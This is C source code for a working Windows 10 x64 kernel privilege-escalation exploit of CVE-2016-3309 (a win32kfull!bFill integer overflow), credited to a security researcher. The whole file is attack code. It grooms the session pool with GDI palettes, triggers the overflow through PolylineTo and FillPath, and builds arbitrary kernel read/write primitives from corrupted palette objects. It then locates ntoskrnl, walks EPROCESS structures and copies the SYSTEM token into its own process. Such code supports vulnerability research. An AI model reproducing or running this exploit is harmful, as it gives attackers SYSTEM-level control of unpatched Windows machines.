#include <Windows.h>
#include <stdio.h>

/*
0: kd> dt ntdll!_EPROCESS uniqueprocessid token activeprocesslinks.
dtx is unsupported for this scenario.  It only recognizes dtx [<type>] [<address>] with -a, -h, and -r.  Reverting to dt.
+0x2e0 UniqueProcessId     : Ptr64 Void
+0x2e8 ActiveProcessLinks  :
+0x000 Flink               : Ptr64 _LIST_ENTRY
+0x008 Blink               : Ptr64 _LIST_ENTRY
+0x358 Token               : _EX_FAST_REF
*/
typedef struct
{
	DWORD UniqueProcessIdOffset;
	DWORD ActiveProcessLinksOffset;
	DWORD TokenOffset;

	/* 
	unfortunately, the nt!EmpCheckErrataList is not exported.
	but you can get the offset like this:
	0: kd> ? nt!EmpCheckErrataList - nt
	Evaluate expression: 1284192 = 00000000`00139860
	*/
	DWORD nt_EmpCheckErrataList_offset;
} VersionSpecificConfig;

VersionSpecificConfig gConfig = { 0x2e0, 0x2e8, 0x358, 0x139860, }; // win10 x64, build 15063.540

bool go = false;
HPALETTE pwnd_palette = 0;
HPALETTE manager_palette = 0;
HPALETTE worker_palette = 0;
BYTE* manager_bits = 0;

// palette_overflow_count is specific to the scenario that the palettes are located at 
// the beginning of a separate pool page (i.e. with a distance of 0x1000)
int palette_overflow_count_until_cEntries = 0xf98;
int palette_overflow_count_until_pFirstColor = palette_overflow_count_until_cEntries + 0x60;

typedef struct target_objs_ {
	HPALETTE dummy_palette;
	HPALETTE pwnd_palette;
	HPALETTE manager_palette;
	HPALETTE worker_palette;
}target_objs;

int create_objs_count = 0x800;
target_objs* targets_objects;


// make these global as well for accessibility in cleanup
HDC hdc;
HDC hMemDC;
HGDIOBJ bitmap;
HGDIOBJ bitobj;

typedef HANDLE(WINAPI* ZwUserConvertMemHandle)(BYTE* buf, DWORD size);
ZwUserConvertMemHandle pfnUserConvertMemHandle = 0;
HANDLE AllocateOnSessionPool(unsigned int size) {
	if (!pfnUserConvertMemHandle) {
		pfnUserConvertMemHandle = (ZwUserConvertMemHandle)GetProcAddress(LoadLibrary("win32u.dll"), "NtUserConvertMemHandle");
		if (!pfnUserConvertMemHandle) {
			// on win8.1 this function is located in user32.dll
			pfnUserConvertMemHandle = (ZwUserConvertMemHandle)GetProcAddress(LoadLibrary("user32.dll"), "NtUserConvertMemHandle");
			if (!pfnUserConvertMemHandle) {
				printf("could not find win32u!NtUserConvertMemHandle. exiting.\n");
				return INVALID_HANDLE_VALUE;
			}
		}
		//printf("pfnUserConvertMemHandle @ 0x%llx\n", (UINT64)pfnUserConvertMemHandle);
	}
	/*
	alloc_size will be passed to HMAllocObject, i.e. pool buffer will be preceded by 0x10 bytes header - that's why we calc -0x10
	the -0x14 comes from win32kfull!ConvertMemHandle  (lea r9d, [rdi+14h])
	*/
	int alloc_size = size - 0x14;
	BYTE *buffer = (BYTE*)malloc(alloc_size);
	memset(buffer, 0x41, alloc_size);
	HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, size);
	BYTE* buf = (BYTE*)GlobalLock(hMem);
	memcpy(buf, buffer, alloc_size);
	HANDLE hMem2 = pfnUserConvertMemHandle(buf, alloc_size);
	GlobalUnlock(hMem);
	return hMem;
}

void FreeFromSessionPool(HANDLE hMem) {
	/*
	for some reason, this doesn't work. TODO!
	*/
	SetClipboardData(CF_TEXT, hMem);
	EmptyClipboard();
}

HPALETTE createPaletteofSize(int size) {
	// we alloc a palette which will have the specific size on the paged session pool. 
	if (size <= 0x90) {
		printf("bad size! can't allocate palette of size < 0x90!\n");
		return 0;
	}
	int pal_cnt = (size - 0x90) / 4;
	int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
	LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
	memset(lPalette, 0x4, palsize);
	lPalette->palNumEntries = pal_cnt;
	lPalette->palVersion = 0x300;
	return CreatePalette(lPalette);
}

int writeOOB(UINT64 target_address, BYTE* data, int size) {
	if (!manager_palette || !worker_palette) {
		printf("[-] palettes not initialized yet!\n");
		return 0;
	}

	if (!manager_bits) {
		// need to read with GetPaletteEntries at least once before we can start
		printf("[-] manager_bits not initialized yet!\n");
		return 0;
	}
		
	// set cEntries
	memcpy(&manager_bits[palette_overflow_count_until_pFirstColor - (0x18*4)], &size, sizeof(DWORD));

	// set pFirstColor to target_address
	memcpy(&manager_bits[palette_overflow_count_until_pFirstColor - 0x8], &target_address, sizeof(UINT64));

	// set data to copy
	memcpy(manager_bits, data, size);

	// overflow into worker_palette to set values
	SetPaletteEntries(manager_palette, 0, palette_overflow_count_until_pFirstColor / 4, (PALETTEENTRY*)manager_bits);
	
	// trigger SetPaletteEntries on worker_palette to write the actual data
	// return actual amount of bytes written (*4), not amount of palette entries written
	return SetPaletteEntries(worker_palette, 0, size / 4, (PALETTEENTRY*)data) * 4;
}

int readOOB(UINT64 target_address, BYTE* data, int size) {
	if (!manager_palette || !worker_palette) {
		printf("[-] palettes not initialized yet!\n");
		return 0;
	}

	if (!manager_bits) {
		// need to read with GetPaletteEntries at least once before we can start
		printf("[-] manager_bits not initialized yet!\n");
		return 0;
	}
	
	// set cEntries
	memcpy(&manager_bits[palette_overflow_count_until_pFirstColor - (0x18 * 4)], &size, sizeof(DWORD));

	// set pFirstColor to target_address
	memcpy(&manager_bits[palette_overflow_count_until_pFirstColor - 0x8], &target_address, sizeof(UINT64));

	// overflow into worker_palette to set values
	SetPaletteEntries(manager_palette, 0, palette_overflow_count_until_pFirstColor / 4, (PALETTEENTRY*)manager_bits);
	
	// trigger GetPaletteEntries on worker_palette to read the actual data
	// return actual amount of bytes read (*4), not amount of palette entries read
	return GetPaletteEntries(worker_palette, 0, size / 4, (PALETTEENTRY*)data) * 4;
}

void continuation_thread() {

	printf("[+] continuation thread waiting for signal...\n");
	while (!go)
		Sleep(100);

	// now we're in the overflow loop in the main thread. wait a bit to make sure we've hit the overflow
	Sleep(1000);

	printf("[+] now check overflow success in continuation thread\n");

	// stay in loop of GetPaletteEntries read attempts until we detect that we have OOB RW capabilities
	int oob_read_count = 0x1000;
	manager_bits = (BYTE*)malloc(oob_read_count);
	int cRead = 0;
	while (!cRead) {
		cRead = GetPaletteEntries(manager_palette, 0, oob_read_count / 4, (PALETTEENTRY*)manager_bits);
		if (cRead != oob_read_count / 4) {
			printf("[-] could not detect arbitrary RW. expected to read 0x%x but only got 0x%x\n", oob_read_count, cRead * 4);
			return;
		}
		Sleep(1000);
	}

	printf("[+] successfully detected OOB RW capability in continuation thread!\n");

	/////// as soon as we have arbitrary RW we repair several structure members 
	UINT64 worker_palette_obj = (UINT64)manager_bits + palette_overflow_count_until_cEntries - 0x20;
	//printf("[+] worker palette object is @ 0x%llx\n", worker_palette_obj);

	/////// then we repair the overwritten handle of the pwnd_palette!

	// original_pFirstColor points to manager_palette + 0x78 (or pool page + 0x88)
	DWORD offset_start_PaletteObject_to_pFirstColor = 0x78;
	UINT64 worker_palette_pFirstColor = *(UINT64*)(worker_palette_obj + offset_start_PaletteObject_to_pFirstColor);
	//printf("[+] worker_palette_pFirstColor: 0x%llx\n", worker_palette_pFirstColor);
	UINT64 pwnd_palette_address = worker_palette_pFirstColor - (offset_start_PaletteObject_to_pFirstColor + 0x10) - 0x2000;
	UINT64 manager_palette_address = worker_palette_pFirstColor - (offset_start_PaletteObject_to_pFirstColor + 0x10) - 0x1000;
	UINT64 worker_palette_address = worker_palette_pFirstColor - (offset_start_PaletteObject_to_pFirstColor + 0x10);
	printf("[+] pwnd palette located @ 0x%llx\n", pwnd_palette_address);
	printf("[+] manager palette located @ 0x%llx\n", manager_palette_address);
	printf("[+] worker palette located @ 0x%llx\n", worker_palette_address);

	printf("[+] repairing BASEOBJ64.hHmgr value of pwnd_palette (0x%llx) at address 0x%llx\n", (UINT64)pwnd_palette, pwnd_palette_address);
	int cWritten = writeOOB(pwnd_palette_address, (BYTE*)&pwnd_palette, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] repair of pwnd_palette handle failed!\n");
		return;
	}

	/*
	fix pool header, this is static for a given size. errm. lol. kernel hacking is so 1999 >_<
	0: kd> db ffffe428`9c5f8000+2000
	ffffe428`9c5fa000  00 00 ff 23 47 68 30 35-00 00 00 00 00 00 00 00  ...#Gh05........
	ffffe428`9c5fa010  50 08 05 0c 00 00 00 00-00 00 00 00 00 00 00 00  P...............
	ffffe428`9c5fa020  80 c0 3b d7 81 a9 ff ff-00 00 00 00 00 00 00 00  ..;.............
	*/
	BYTE pool_header_palette[] = "\x00\x00\xff\x23\x47\x68\x30\x38\x00\x00\x00\x00\x00\x00\x00\x00";
	printf("[+] repairing pool header of pwnd_palette\n");
	cWritten = writeOOB(pwnd_palette_address - 0x10, (BYTE*)&pool_header_palette, sizeof(pool_header_palette) - 1);
	if (cWritten != sizeof(pool_header_palette) - 1) {
		printf("[-] repair of pool_header_palette failed!\n");
		return;
	}

	printf("[+] repairing ref counts of palettes\n");
	UINT64 null_ptr = 0;
	cWritten = writeOOB(pwnd_palette_address + 0x8, (BYTE*)&null_ptr, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] repair of ref count for pwnd_palette failed!\n");
		return;
	}
	cWritten = writeOOB(manager_palette_address + 0x8, (BYTE*)&null_ptr, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] repair of ref count for manager_palette failed!\n");
		return;
	}

	printf("[+] repairing pool header after pwnd_palette buffer\n");
	BYTE next_pool_header[] = "\xff\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
	cWritten = writeOOB(manager_palette_address - 0x20, (BYTE*)&next_pool_header, sizeof(next_pool_header) - 1);
	if (cWritten != sizeof(next_pool_header) - 1) {
		printf("[-] repair of next_pool_header failed!\n");
		return;
	}

	printf("[+] now getting ntoskrnl base\n");

	UINT64 nt_EmpCheckErrataList = 0;
	UINT64 tid_ptr = *(UINT64*)(worker_palette_obj + 0x10); // the BASEOBJECT64 structure seems to have changed. obviously, this is not a tid ;)
	printf("[+] reading nt!EmpCheckErrataList from @ 0x%llx\n", tid_ptr + 0x2a8);
	cRead = readOOB(tid_ptr + 0x2a8, (BYTE*)&nt_EmpCheckErrataList, sizeof(UINT64));
	if (cRead != sizeof(UINT64) || !nt_EmpCheckErrataList) {
		printf("[-] couldn't read nt!EmpCheckErrataList pointer!\n");
		return;
	}

	printf("[+] nt!EmpCheckErrataList @ 0x%llx\n", nt_EmpCheckErrataList);

	UINT64 ntoskrnl_base_address = nt_EmpCheckErrataList - gConfig.nt_EmpCheckErrataList_offset;
	printf("[+] ntoskrnl base address: 0x%llx\n", ntoskrnl_base_address);

	UINT64 ntoskrnl = (UINT64)LoadLibrary("ntoskrnl.exe");
	// get address of exported PsInitialSystemProcess variable
	UINT64 pPsInitialSystemProcess = (UINT64)GetProcAddress((HMODULE)ntoskrnl, "PsInitialSystemProcess");
	UINT64 delta_PsInitialSystemProcess = pPsInitialSystemProcess - ntoskrnl;
	FreeLibrary((HMODULE)ntoskrnl);

	printf("[+] reading system EPROCESS from 0x%llx\n", ntoskrnl_base_address + delta_PsInitialSystemProcess);
	UINT64 system_eprocess = 0;
	// subtract addr from ntos to get PsInitialSystemProcess offset from base
	cRead = readOOB(ntoskrnl_base_address + delta_PsInitialSystemProcess, (BYTE *)&system_eprocess, sizeof(UINT64));
	if (cRead != sizeof(UINT64) || !system_eprocess) {
		printf("[-] couldn't read SYSTEM eprocess!\n");
		return;
	}
	printf("[+] system eprocess @ 0x%llx\n", system_eprocess);

	// walk ActiveProcessLinks until we find our Pid
	LIST_ENTRY ActiveProcessLinks;
	cRead = readOOB(system_eprocess + gConfig.ActiveProcessLinksOffset, (BYTE*)&ActiveProcessLinks, sizeof(LIST_ENTRY));
	if (cRead != sizeof(LIST_ENTRY) || !ActiveProcessLinks.Flink) {
		printf("[-] couldn't read ActiveProcessLinks!\n");
		return;
	}

	printf("[+] now walking ActiveProcessLinks to find EPROCESS of current process...\n");
	UINT64 pEPROCESS = 0;
	UINT64 current_proc_eprocess = 0;
	UINT64 UniqueProcessId = 0;
	while (1) {
		pEPROCESS = (UINT64)ActiveProcessLinks.Flink - gConfig.ActiveProcessLinksOffset;

		// get pid of current EPROCESS
		cRead = readOOB(pEPROCESS + gConfig.UniqueProcessIdOffset, (BYTE*)&UniqueProcessId, sizeof(UINT64));
		if (cRead != sizeof(UINT64) || !UniqueProcessId) {
			printf("[-] could not read ActiveProcessLinks!\n");
			break;
		}
		//printf("[+] pEPROCESS 0x%llx, PID 0x%llx (0x%x)\n", pEPROCESS, UniqueProcessId, GetCurrentProcessId());

		// is this our pid? break loop if this is the case
		if (GetCurrentProcessId() == UniqueProcessId) {
			current_proc_eprocess = pEPROCESS;
			break;
		}

		// get next entry
		cRead = readOOB(pEPROCESS + gConfig.ActiveProcessLinksOffset, (BYTE*)&ActiveProcessLinks, sizeof(LIST_ENTRY));
		if (cRead != sizeof(LIST_ENTRY) || !ActiveProcessLinks.Flink) {
			printf("[-] could not read ActiveProcessLinks!\n");
			break;
		}

		// if next same as last, we reached the end
		if (pEPROCESS == (UINT64)ActiveProcessLinks.Flink - gConfig.ActiveProcessLinksOffset)
			break;
	}

	if (!current_proc_eprocess) {
		printf("[-] walking EPROCESS structures failed: could not spot current process EPROCESS!\n");
		return;
	}

	printf("[+] found EPROCESS of current process @ 0x%llx\n", current_proc_eprocess);
	printf("[+] getting SYSTEM token\n");
	UINT64 SystemToken = 0;
	cRead = readOOB(system_eprocess + gConfig.TokenOffset, (BYTE*)&SystemToken, sizeof(UINT64));
	if (cRead != sizeof(UINT64) || !SystemToken) {
		printf("[-] could not read SYSTEM token\n");
		return;
	}

	printf("[+] writing SYSTEM token address 0x%llx to current EPROCESS at 0x%llx\n", SystemToken, current_proc_eprocess + gConfig.TokenOffset);
	cWritten = writeOOB(current_proc_eprocess + gConfig.TokenOffset, (BYTE*)&SystemToken, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] writing SYSTEM token failed!\n");
		return;
	}

	printf("[+] cleanup...\n");
	for (int i = 0; i < create_objs_count; i++) {
		DeleteObject(targets_objects[i].dummy_palette);
		// we only skip the pwnd palette since it is locked by the SetPalEntries syscall in main thread :)
		if (targets_objects[i].manager_palette != manager_palette)
			DeleteObject(targets_objects[i].pwnd_palette);
		DeleteObject(targets_objects[i].manager_palette);
		DeleteObject(targets_objects[i].worker_palette);
	}
	DeleteObject(bitobj);
	DeleteObject(bitmap);
	DeleteDC(hMemDC);
	ReleaseDC(NULL, hdc);

	printf("[+] done.\n");
	return;
}

void main(int argc, char* argv[]) {
	printf("[+] win32kfull!bFill (aka. CVE-2016-3309) reloaded, @bitshifter123, siberas, 10/2017\n");
	printf("[+] target: Windows 10 x64 RS2 (build 15063.540)\n");
	printf("[+] exploitation primitive: PALETTES\n");

	hdc = GetDC(NULL);
	hMemDC = CreateCompatibleDC(hdc);
	bitmap = CreateBitmap(0x666, 0x1338, 1, 32, NULL);
	bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);

	int read_palettes_count = 0x1000;
	bool success = false;
	PALETTEENTRY *rPalette = (PALETTEENTRY*)calloc(read_palettes_count, sizeof(PALETTEENTRY));
	memset(rPalette, 0x04, read_palettes_count * sizeof(PALETTEENTRY));

	DWORD deadc0de = 0xdeadc0de;
	memcpy(&rPalette[(palette_overflow_count_until_cEntries / 4) -1], &deadc0de, sizeof(DWORD));
	/*
	fix pool header, this is static for a given size
	0: kd> db ffffe428`9c6c8000+2000
	ffffe428`9c6ca000  00 00 ff 23 47 68 30 35-00 00 00 00 00 00 00 00  ...#Gh08........
	ffffe428`9c6ca010  50 57 05 0c 00 00 00 00-00 00 00 00 00 00 00 00  P...............
	ffffe428`9c6ca020  80 c0 3b d7 81 a9 ff ff-00 00 00 00 00 00 00 00  ..;.............
	*/
	BYTE pool_header_palette[] = "\x00\x00\xff\x23\x47\x68\x30\x38\x00\x00\x00\x00\x00\x00\x00\x00";
	memcpy(&rPalette[(palette_overflow_count_until_cEntries / 4) - 12], &pool_header_palette, sizeof(pool_header_palette) - 1);


	// kick off second thread which will keep us alive when we hit the SetPaletteEntries syscall on the overwritten object
	DWORD tid;
	CreateThread(0, 0, (LPTHREAD_START_ROUTINE)continuation_thread, 0, 0, &tid);

	/*
	// offset +0
	0x30: 0x10000 * 0x10000 = 0x10000000 => 0x10000001 * 0x30 = (int32)0x30
	0x60: 0x11 * 0xf0f0f1 = 0x10000001 => 0x10000002 * 0x30 = (int32)0x60
	0x90: 0xc06*0x154ab = 0x10000002 => 0x10000003 * 0x30 = (int32)0x90

	// offset +10
	0x10: 0xccd*0xd552	= 0xaaaaaaa => 0xaaaaaab *0x30 = 0x200000010 = (int32)0x10 => alloc of 0x20
	0x40: 0x3b*0x2e4851	= 0xaaaaaab => 0xaaaaaac *0x30 = 0x200000040 = (int32)0x40 => alloc of 0x50
	0x70: 0x804*0x154ab	= 0xaaaaaac => 0xaaaaaad *0x30 = 0x200000070 = (int32)0x70 => alloc of 0x80
	0xa0: 0x1769*0x74a5	= 0xaaaaaad => 0xaaaaaae *0x30 = 0x2000000a0 = (int32)0xa0 => alloc of 0xb0

	// offset +20
	0x20: 0x27b*0x2266f = 0x5555555 => 0x5555556 * 0x30 = (int32)0x20 => alloc of 0x30 bytes
	0x50: 0x156*0x3FE01 = 0x5555556 => 0x5555557 * 0x30 = (int32)0x50 => alloc of 0x60 bytes
	0x80: 0xa1*0x87af7	= 0x5555557 => 0x5555558 * 0x30 = (int32)0x80 => alloc of 0x90 bytes
	0xb0: 0xfd3*0x5648	= 0x5555558 => 0x5555559 * 0x30 = (int32)0xb0 => alloc of 0xc0 bytes
	0xe0: 0x13369*0x471	= 0x5555559 => 0x555555a * 0x30 = (int32)0xe0 => alloc of 0xf0 bytes
	*/
	int sizeA = 0x1769;
	int sizeB = 0x74a5;
	// both sizes are WITHOUT header, i.e. if they should add up to 0x1000
	// we need for example chunksize 0xf40 and palette_size 0xa0. 0xf40 + 0x10 + 0xa0 + 0x10 == 0x1000
	DWORD chunksize = (DWORD)(((sizeA * sizeB) + 1) * 0x30);
	UINT64 real_size = (((UINT64)sizeA * (UINT64)sizeB) + 1) * 0x30;
	int palette_size = 0x1000 - 0x10 - chunksize - 0x10;
	//printf("[+] sizeA 0x%x\n", sizeA);
	//printf("[+] sizeB 0x%x\n", sizeB);
	printf("[+] prepare int overflow: ((0x%x * 0x%x) + 1) * 0x30 == 0x%llx == (int32) 0x%x\n", sizeA, sizeB, real_size, chunksize);
	//printf("[+] chunksize == 0x%x => palette_size == 0x%x\n", chunksize, palette_size);
	printf("[+] header + chunksize + header + palette_size = 0x%x + 0x10 + 0x%x + 0x10 = 0x%x\n", chunksize, palette_size, chunksize + 0x10 + palette_size + 0x10);

	if (chunksize > 0x1000 ||
		palette_size > 0x1000 ||
		palette_size + chunksize + 0x20 != 0x1000) {
		printf("[-] bad sizes!? exiting!\n");
		return;
	}

	POINT* points = (POINT*)malloc(sizeB * sizeof(POINT));
	DWORD point_value = 0x66000000;
	for (int x = 0; x < sizeB; x++) {
		points[x].x = point_value;
		points[x].y = point_value;
	}

	printf("[BUG 1/4] BeginPath\n");	
	if (!BeginPath(hMemDC)) {
		printf("[-] BeginPath() Failed: %x\n", GetLastError());
		return;
	}

	printf("[BUG 2/4] PolylineTo\n");
	for (int j = 0; j < sizeA; j++) {
		if (j == 0)
		{
			points[1].x = 0x11223344;
			points[1].y = 0x360;
			points[2].x = 1;
			points[2].y = 0x400;
		}
		else
		{
			points[1].x = point_value;
			points[1].y = point_value;
			points[2].x = point_value;
			points[2].y = point_value;
		}

		if (!PolylineTo(hMemDC, points, sizeB)) {
			printf("[-] PolylineTo() Failed: %x\n", GetLastError());
			return;
		}
	}

	printf("[BUG 3/4] EndPath\n");
	EndPath(hMemDC);

	printf("[+] now perform pool feng shui...\n");

	SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);


	// defragment on page level  we will cause 0xfe0 + 0x10 = 0xff0-sized buffers, filling one pool page each
	for (int i = 0; i < 0x400; i++) {
		AllocateOnSessionPool(0xfe0);
	}

	// defragment with chunksize - we will create buffer on pool of size chunsize + 0x10
	for (int i = 0; i < 0x5000; i++) {
		AllocateOnSessionPool(chunksize);
	}

	targets_objects = (target_objs*)calloc(create_objs_count, sizeof(target_objs));

	for (int i = 0; i < create_objs_count; i++) {
		targets_objects[i].dummy_palette = createPaletteofSize(palette_size);
		targets_objects[i].pwnd_palette = createPaletteofSize(0xfe0);   // -> pool will be 0xff0 alloc'ed / 0x10 free
		targets_objects[i].manager_palette = createPaletteofSize(0xfe0); // -> pool will be 0xff0 alloc'ed / 0x10 free
		targets_objects[i].worker_palette = createPaletteofSize(0xfe0);  // -> pool will be 0xff0 alloc'ed / 0x10 free
	}

	// now trigger some more chunksize allocations to fill the holes
	for (int i = 0; i < create_objs_count / 2; i++) {
		AllocateOnSessionPool(chunksize);
	}

	// finally, trigger bug in FillPath!
	FillPath(hMemDC);

	SetPriorityClass(GetCurrentProcess(), NORMAL_PRIORITY_CLASS);
	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);

	printf("[BUG 4/4] hit trigger in FillPath!\n");
	printf("[+] trigger 2nd overflow via SetPaletteEntries - main thread will deadlock now\n");
	Sleep(100);

	// set flag for continuation thread and hit SetPaletteEntries right afterwards
	go = true;

	// trigger overflow into manager palette to set EPALOBJ.cEntries
	// be carful to overwrite with correct BaseObject.hHmgr!
	for (int i = create_objs_count - 1; i >= 0; i--) {

		// set global palette vars
		pwnd_palette = targets_objects[i].pwnd_palette;
		manager_palette = targets_objects[i].manager_palette;
		worker_palette = targets_objects[i].worker_palette;

		// make sure we overwrite BASEOBJET64.hHmgr with the correct manager_palette handle
		memcpy(&rPalette[(palette_overflow_count_until_cEntries / 4) - 8], &manager_palette, sizeof(UINT64));

		// attempt overflow from pwnd_palette into manager_palette
		// if we hit the overwritten object we'll never return from this call
		if (SetPaletteEntries(pwnd_palette, 0, palette_overflow_count_until_cEntries / 4, rPalette) == (palette_overflow_count_until_cEntries / 4))
			break;
	}

	// do not exit main thread if we return from the loop without hitting the overwrite
	// if something else got overwritten you'd just BSOD your machine ;)
	Sleep(-1);
}
